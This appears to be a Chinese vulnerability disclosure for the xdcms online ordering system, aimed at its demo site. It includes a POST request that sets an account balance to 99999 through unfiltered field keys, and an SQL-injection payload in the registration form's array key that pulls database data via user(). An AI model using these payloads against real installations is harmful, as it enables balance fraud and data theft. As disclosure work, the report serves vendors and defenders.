xdcms网上订餐系统 sql注入 #2

### 简要描述： rt ### 详细说明： #1 对于修改资料时，post的数组的key做了些过滤。 可是我们还是能 非法修改一些重要字段的。例如 ``` http://demo.xdcms.cn/index.php?m=member&f=edit_save ``` post ``` fields%5Bthumb%5D=1&fields%5Bmoney%5D=99999&fields%5Bsex%5D=%E7%94%B7&fields%5Bemail%5D=333333%40333.com&fields%5Baddress%5D=1&gourl= ``` 无限充值了。 [<img src="https://images.seebug.org/upload/201501/29104650a63583ea6653dde180800bdeaa1192b1.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29104650a63583ea6653dde180800bdeaa1192b1.png) #2 同样是post的数组的key的过滤问题。 少过滤了一处。 注册处。 http://demo.xdcms.cn/index.php?m=member&f=register_save post ``` username=aaaaxaa&password=aaaaaa&password2=aaaaaa&fields%5B`email%5D=aaaaaa%40qq.com&phone=13785966598&verifycode=bf5f&agree=1 ``` [<img src="https://images.seebug.org/upload/201501/291048354f5b70062a720a0293c315cbb0be7d85.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/291048354f5b70062a720a0293c315cbb0be7d85.png) 在email前加个`报错了。 post ``` username=aaaaxaa&password=aaaaaa&password2=aaaaaa&fields%5B`email`) values (1,1,1,1,1,1,1,100,1,1,user())%23%5D=aaaaaa%40qq.com&phone=13785966598&verifycode=bf5f&agree=1 ``` 数据出来了 [<img src="https://images.seebug.org/upload/201501/29104922943fcd8615ce072c571f9dff476972aa.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29104922943fcd8615ce072c571f9dff476972aa.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/29104922943fcd8615ce072c571f9dff476972aa.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29104922943fcd8615ce072c571f9dff476972aa.png)